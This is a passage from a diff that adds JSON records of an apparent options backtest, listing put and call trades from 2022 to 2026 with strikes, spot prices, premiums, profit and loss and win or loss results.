39.88440863443073, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-07-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.38, + "spot": 12.793954849243164, + "premium": 0.46177905254327944, + "close_cost": 0.08840230119295689, + "pnl": 31.357675135032256, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-07-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.78, + "spot": 14.880910873413086, + "premium": 0.3401950042363051, + "close_cost": 0.04881996972079938, + "pnl": 23.15750345155057, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-07-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.27, + "spot": 14.68033218383789, + "premium": 0.29631130665900995, + "close_cost": 0.043521431528401155, + "pnl": 19.29898751306088, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-08-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.81, + "spot": 17.263957977294922, + "premium": 0.379369284171184, + "close_cost": 0.06100959220419444, + "pnl": 25.855969196698954, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-08-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 15.14, + "spot": 18.13789939880371, + "premium": 0.3762310692050539, + "close_cost": 0.020812612823714605, + "pnl": 29.561845638133928, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-08-24 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 16.74, + "spot": 15.621136665344238, + "premium": 0.41641538623991625, + "close_cost": 1.1188633346557602, + "pnl": -73.23479484158439, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-08-29 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 15.93, + "spot": 13.997414588928223, + "premium": 0.531237931739243, + "close_cost": 0.011324413913842868, + "pnl": 46.01135178254002, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-02 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.28, + "spot": 12.741421699523926, + "premium": 0.588977588200847, + "close_cost": 0.03251577801025618, + "pnl": 49.66618101905908, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-09-09 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.0, + "spot": 14.250523567199707, + "premium": 0.48822963709132416, + "close_cost": 1.250523567199707, + "pnl": -79.21939301083829, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-16 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 13.4, + "spot": 11.748086929321289, + "premium": 0.3228264596347854, + "close_cost": 1.6519130706787113, + "pnl": -135.8986611043926, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.98, + "spot": 11.09859848022461, + "premium": 0.5876688420242386, + "close_cost": 0.07515380269642047, + "pnl": 45.27150393278181, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-26 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.32, + "spot": 10.038409233093262, + "premium": 0.5412396443262226, + "close_cost": 0.01038329437591945, + "pnl": 47.105634995030314, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-30 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.24, + "spot": 9.226546287536621, + "premium": 0.41429268666561114, + "close_cost": 0.056076644340043336, + "pnl": 29.84160423255678, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-10-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.41, + "spot": 9.312507629394531, + "premium": 0.4330158837121405, + "close_cost": 0.0, + "pnl": 37.32158837121405, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-10-11 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.5, + "spot": 8.663019180297852, + "premium": 0.5002583263902016, + "close_cost": 0.05294318564386513, + "pnl": 38.75151407463365, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-10-18 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.84, + "spot": 9.446227073669434, + "premium": 0.3672842257102742, + "close_cost": 0.6062270736694337, + "pnl": -26.884284795915953, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.88, + "spot": 10.157797813415527, + "premium": 0.32406077709888814, + "close_cost": 0.00216267648676112, + "pnl": 26.209810061212703, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-11-01 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 10.12, + "spot": 9.694558143615723, + "premium": 0.3863004261544667, + "close_cost": 0.42544185638427656, + "pnl": -6.904143022980987, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.89, + "spot": 8.190231323242188, + "premium": 0.494897419694027, + "close_cost": 0.04803599118242163, + "pnl": 38.706142851160536, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-11-10 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.35, + "spot": 10.243757247924805, + "premium": 0.46073365315508275, + "close_cost": 1.893757247924805, + "pnl": -146.29235947697225, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.63, + "spot": 10.96488094329834, + "premium": 0.5088533907697474, + "close_cost": 0.0450031687079917, + "pnl": 40.40502220617557, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-11-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.81, + "spot": 10.855040550231934, + "premium": 0.4771281689474587, + "close_cost": 0.01992159167453622, + "pnl": 39.740657727292245, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-11-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.99, + "spot": 11.251418113708496, + "premium": 0.4401729205346636, + "close_cost": 0.05681924691467111, + "pnl": 32.35536736199926, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-09 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 10.51, + "spot": 9.976323127746582, + "premium": 0.4301959086899507, + "close_cost": 0.5336768722534178, + "pnl": -13.338096356346703, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-12-15 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.18, + "spot": 9.379365921020508, + "premium": 0.375595205881039, + "close_cost": 0.007341668200315565, + "pnl": 30.845353768072346, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-12-19 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.57, + "spot": 8.725102424621582, + "premium": 0.37989575764118655, + "close_cost": 0.04984568230754327, + "pnl": 27.025007533364327, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-12-27 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.9, + "spot": 8.0839262008667, + "premium": 0.3626300935905844, + "close_cost": 0.0, + "pnl": 30.283009359058443, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2023-01-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.25, + "spot": 8.117528915405273, + "premium": 0.3426799452212159, + "close_cost": 0.0, + "pnl": 28.28799452212159, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-01-10 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.28, + "spot": 8.875996589660645, + "premium": 0.2814481694691553, + "close_cost": 0.5959965896606452, + "pnl": -34.444842019148986, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.28, + "spot": 12.236298561096191, + "premium": 0.2855929112172544, + "close_cost": 0.010777933535611517, + "pnl": 21.50149776816429, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 11.76, + "spot": 10.738565444946289, + "premium": 0.2976777005517577, + "close_cost": 1.0214345550537107, + "pnl": -75.3656854501953, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-28 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.95, + "spot": 10.623353004455566, + "premium": 0.45030620053053205, + "close_cost": 0.07536713718272425, + "pnl": 31.51390633478078, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.84, + "spot": 10.887377738952637, + "premium": 0.4193260252966553, + "close_cost": 0.04737773895263686, + "pnl": 31.214828634401844, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.11, + "spot": 10.023299217224121, + "premium": 0.33685632418656475, + "close_cost": 0.024416285671523874, + "pnl": 25.264003851504086, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 10.22, + "spot": 11.794658660888672, + "premium": 0.28971106791747747, + "close_cost": 1.5746586608886712, + "pnl": -131.48475929711938, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.76, + "spot": 16.755001068115234, + "premium": 0.21085385118860112, + "close_cost": 0.024723030455053308, + "pnl": 12.633082073354782, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2023-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 17.37, + "spot": 19.817272186279297, + "premium": 0.2530113778450671, + "close_cost": 0.009090959223713446, + "pnl": 18.412041862135364, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2023-11-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.46, + "spot": 20.930387496948242, + "premium": 0.2933258154299141, + "close_cost": 0.04702580115868393, + "pnl": 18.650001427123016, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-01-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.09, + "spot": 23.8001766204834, + "premium": 0.12668482779862034, + "close_cost": 0.0003487650964239322, + "pnl": 6.65360627021964, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-01-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.57642936706543, + "premium": 0.15674767379184473, + "close_cost": 0.016299980354178234, + "pnl": 8.064769343766649, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-01-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.09, + "spot": 26.626907348632812, + "premium": 0.13557657405966683, + "close_cost": 0.00269450813255942, + "pnl": 7.308206592710741, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-02-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.16, + "spot": 27.945068359375, + "premium": 0.19947309888330533, + "close_cost": 0.005233753924596768, + "pnl": 13.443934495870856, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.04, + "spot": 28.818965911865234, + "premium": 0.25218200398079205, + "close_cost": 0.0405504200599609, + "pnl": 15.183158392083115, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.74, + "spot": 29.375520706176758, + "premium": 0.21070462638584964, + "close_cost": 0.029593663047855823, + "pnl": 12.13109633379938, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.49, + "spot": 30.820619583129883, + "premium": 0.32887066067871196, + "close_cost": 0.018307249516289814, + "pnl": 25.076341116242215, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-03-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.09, + "spot": 30.66439437866211, + "premium": 0.2963066088321611, + "close_cost": 0.034359658257141934, + "pnl": 20.214695057501917, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.4, + "spot": 29.19488525390625, + "premium": 0.38599058097251504, + "close_cost": 0.0, + "pnl": 32.6190580972515, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-03-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.44, + "spot": 30.62314796447754, + "premium": 0.3386069222914845, + "close_cost": 0.0288315817018987, + "pnl": 24.99753405895858, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-04-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.28, + "spot": 30.3487606048584, + "premium": 0.24281235905873544, + "close_cost": 0.0006781837741130503, + "pnl": 18.233417528462237, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.76, + "spot": 29.349225997924805, + "premium": 0.19863974996013845, + "close_cost": 0.001491162708708249, + "pnl": 13.73485872514302, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-04-16 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 27.87, + "spot": 27.330547332763672, + "premium": 0.13149686962159368, + "close_cost": 0.5394526672363291, + "pnl": -43.78557976147355, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-04-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 27.88, + "spot": 25.845937728881836, + "premium": 0.5128289208188797, + "close_cost": 0.06336268772382425, + "pnl": 38.966623309505536, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-04-19 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 26.36, + "spot": 24.24373435974121, + "premium": 0.47227350761000153, + "close_cost": 0.08607863506036839, + "pnl": 32.63948725496331, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-26 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 24.73, + "spot": 27.085559844970703, + "premium": 0.49323149156024826, + "close_cost": 2.3555598449707027, + "pnl": -189.22283534104545, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-05-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.46, + "spot": 27.781322479248047, + "premium": 0.3164650988545894, + "close_cost": 0.0, + "pnl": 25.66650988545894, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-05-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.11, + "spot": 28.692665100097656, + "premium": 0.4003034305537643, + "close_cost": 0.05419016092151985, + "pnl": 28.631326963224442, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-05-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.25, + "spot": 29.726499557495117, + "premium": 0.3516147254201698, + "close_cost": 0.03658249020128945, + "pnl": 25.523223521888035, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-06-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.83, + "spot": 30.93672752380371, + "premium": 0.11801756088529647, + "close_cost": 0.0027624835143245097, + "pnl": 5.545507737097196, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-06-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.11, + "spot": 36.622718811035156, + "premium": 0.16535850217497217, + "close_cost": 0.017710793013488768, + "pnl": 8.78477091614834, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-07-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.69, + "spot": 39.957427978515625, + "premium": 0.24589707611064604, + "close_cost": 0.013203679635993115, + "pnl": 17.289339647465294, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.77, + "spot": 36.081695556640625, + "premium": 0.35724545761061766, + "close_cost": 0.045893559849865095, + "pnl": 25.155189776075257, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-07-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.25, + "spot": 32.19612503051758, + "premium": 0.5102524511341695, + "close_cost": 0.07444396415987908, + "pnl": 37.60084869742904, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-08 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 29.29, + "spot": 28.556476593017578, + "premium": 0.7010704386546642, + "close_cost": 0.733523406982421, + "pnl": -6.2352968327756795, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-15 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 29.13, + "spot": 33.67165756225586, + "premium": 1.3443913930458482, + "close_cost": 4.54165756225586, + "pnl": -322.7166169210012, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.65, + "spot": 34.85208511352539, + "premium": 1.0726094028013105, + "close_cost": 0.1361933908392352, + "pnl": 87.66160119620751, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-08-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.61, + "spot": 32.63386535644531, + "premium": 0.9025316572967501, + "close_cost": 0.0, + "pnl": 84.273165729675, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-09-05 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 30.68, + "spot": 30.504180908203125, + "premium": 0.7006656943066787, + "close_cost": 0.17581909179687472, + "pnl": 49.494660250980395, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-09-09 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 31.11, + "spot": 29.072914123535156, + "premium": 1.0554585536636392, + "close_cost": 0.20051064050213707, + "pnl": 79.51479131615021, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-16 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 29.65, + "spot": 32.683048248291016, + "premium": 1.0209903290604512, + "close_cost": 3.033048248291017, + "pnl": -204.1957919230566, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-09-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.72, + "spot": 34.71437072753906, + "premium": 0.5286391052217017, + "close_cost": 0.0786268694608343, + "pnl": 39.02122357608674, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-09-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.66, + "spot": 36.114013671875, + "premium": 0.5790615884128893, + "close_cost": 0.10881806604988231, + "pnl": 41.044352236300696, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-10-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.62, + "spot": 35.51202392578125, + "premium": 0.5489919215995869, + "close_cost": 0.08754496284240876, + "pnl": 40.16469587571781, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.28, + "spot": 36.696258544921875, + "premium": 0.25941571479132985, + "close_cost": 0.008494248158130269, + "pnl": 19.112146663319958, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-10-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.93, + "spot": 36.8294792175293, + "premium": 0.26522618310714385, + "close_cost": 0.01822210812993097, + "pnl": 18.720407497721286, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-10-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.3, + "spot": 36.878822326660156, + "premium": 0.19186338694336147, + "close_cost": 0.021248591543435058, + "pnl": 11.081479539992639, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-11-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.21, + "spot": 34.67320251464844, + "premium": 0.2972678999108114, + "close_cost": 0.040867998291427066, + "pnl": 19.65999016193843, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-11-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.13, + "spot": 38.4676628112793, + "premium": 0.4302089860153817, + "close_cost": 0.0, + "pnl": 37.040898601538174, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-11-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.16, + "spot": 39.39037322998047, + "premium": 0.49315040046479197, + "close_cost": 0.026379287104058458, + "pnl": 40.69711133607335, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.05, + "spot": 40.697959899902344, + "premium": 0.349850898726781, + "close_cost": 0.05440123835980115, + "pnl": 23.564966036697985, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-12-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.59, + "spot": 46.03191375732422, + "premium": 0.3072214896690202, + "close_cost": 0.00010293944830915176, + "pnl": 24.731855022071105, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-12-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.54, + "spot": 42.110469818115234, + "premium": 0.4778560262272453, + "close_cost": 0.022182307382831334, + "pnl": 39.587371884441396, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-02 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 41.07, + "spot": 38.927188873291016, + "premium": 0.5758433582098839, + "close_cost": 2.1428111267089847, + "pnl": -159.68677684991007, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 39.71, + "spot": 38.036067962646484, + "premium": 1.1539376837870634, + "close_cost": 0.0, + "pnl": 109.41376837870634, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2025-01-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 38.8, + "spot": 41.159934997558594, + "premium": 1.2706658794142527, + "close_cost": 2.3599349975585966, + "pnl": -111.91691181443439, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.69, + "spot": 41.843135833740234, + "premium": 0.754148104303086, + "close_cost": 0.09637289168709984, + "pnl": 59.79752126159862, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.37, + "spot": 40.9520149230957, + "premium": 0.5349344971373142, + "close_cost": 0.0, + "pnl": 47.51344971373142, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-02-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.49, + "spot": 41.952056884765625, + "premium": 0.6050719076109861, + "close_cost": 0.03732478636423342, + "pnl": 50.79471212467526, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-02-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.5, + "spot": 42.397613525390625, + "premium": 0.5489745121532028, + "close_cost": 0.09381645873837252, + "pnl": 39.53580534148303, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-02-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.8, + "spot": 44.7541389465332, + "premium": 0.4665352896118442, + "close_cost": 0.03986059320860447, + "pnl": 36.68746964032397, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-02-28 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.96, + "spot": 37.090484619140625, + "premium": 0.4533978671235257, + "close_cost": 1.8695153808593759, + "pnl": -144.60175137358502, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-03-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 37.83, + "spot": 34.694358825683594, + "premium": 0.96983983333147, + "close_cost": 0.13659858626724786, + "pnl": 77.3441247064222, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.39, + "spot": 29.610010147094727, + "premium": 0.9927957083355885, + "close_cost": 0.0, + "pnl": 93.29957083355885, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.2, + "spot": 31.23383331298828, + "premium": 1.1216171028545734, + "close_cost": 1.033833312988282, + "pnl": 5.788378986629143, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.36, + "spot": 32.73884201049805, + "premium": 0.7427752262382388, + "close_cost": 0.0, + "pnl": 68.29752262382387, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-31 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 30.77, + "spot": 28.451080322265625, + "premium": 0.8759671266262998, + "close_cost": 2.3189196777343746, + "pnl": -147.2852551108075, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 29.02, + "spot": 24.97538185119629, + "premium": 1.1985388911857449, + "close_cost": 0.12676684661179705, + "pnl": 101.19720445739478, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-04-04 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 25.47, + "spot": 20.402355194091797, + "premium": 1.2617950928584474, + "close_cost": 0.14710848459820358, + "pnl": 105.48866082602437, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-04-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 20.81, + "spot": 24.121355056762695, + "premium": 1.251248163786851, + "close_cost": 3.3113550567626966, + "pnl": -209.00068929758456, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-21 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 22.67, + "spot": 20.784683227539062, + "premium": 1.884560906581294, + "close_cost": 1.8853167724609392, + "pnl": -3.065586587964516, + "hold_days": 10, + "result": "Loss" + }, + { + "date": "2025-04-28 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 21.2, + "spot": 26.723159790039062, + "premium": 2.1244448918288388, + "close_cost": 5.523159790039063, + "pnl": -342.8614898210225, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-05-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.12, + "spot": 28.997262954711914, + "premium": 2.1781560011842007, + "close_cost": 0.0, + "pnl": 211.83560011842007, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-05-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.26, + "spot": 29.280284881591797, + "premium": 1.9102965702347312, + "close_cost": 0.1826081682126306, + "pnl": 166.78884020221008, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-05-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.71, + "spot": 35.223731994628906, + "premium": 0.4750351893430498, + "close_cost": 0.0005443689294594711, + "pnl": 41.46908204135903, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.69, + "spot": 35.55640411376953, + "premium": 0.49816977820345265, + "close_cost": 0.03134317797592279, + "pnl": 40.70266002275298, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.35, + "spot": 53.771759033203125, + "premium": 0.5454111130127384, + "close_cost": 0.007119038262922761, + "pnl": 47.84920747498157, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.0, + "spot": 55.102474212646484, + "premium": 0.5796126730757098, + "close_cost": 0.08764714667265805, + "pnl": 43.21655264030518, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-11-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.92, + "spot": 58.97001266479492, + "premium": 0.8310860718895956, + "close_cost": 0.11816278227018362, + "pnl": 65.31232896194119, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.08, + "spot": 56.17401885986328, + "premium": 0.9419557282829416, + "close_cost": 0.02374045676180936, + "pnl": 85.84152715211322, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-20 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 49.03, + "spot": 46.30082702636719, + "premium": 0.7034804707833988, + "close_cost": 2.7291729736328136, + "pnl": -205.5592502849415, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-11-28 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 47.23, + "spot": 54.36484909057617, + "premium": 1.427283837496578, + "close_cost": 7.134849090576175, + "pnl": -573.7465253079597, + "hold_days": 8, + "result": "Loss" + }, + { + "date": "2025-12-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.1, + "spot": 55.51115417480469, + "premium": 0.8885551408676466, + "close_cost": 0.06195387604228575, + "pnl": 76.68012648253608, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-12-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.61, + "spot": 56.468074798583984, + "premium": 0.7019646533971837, + "close_cost": 0.05252255912201953, + "pnl": 58.96420942751642, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-12-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.29, + "spot": 53.34812545776367, + "premium": 0.5344254020684005, + "close_cost": 0.017192842222265137, + "pnl": 45.74325598461354, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-02-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.48, + "spot": 51.31515884399414, + "premium": 0.5631882299256894, + "close_cost": 0.03924295334710992, + "pnl": 46.414527657857946, + "hold_days": 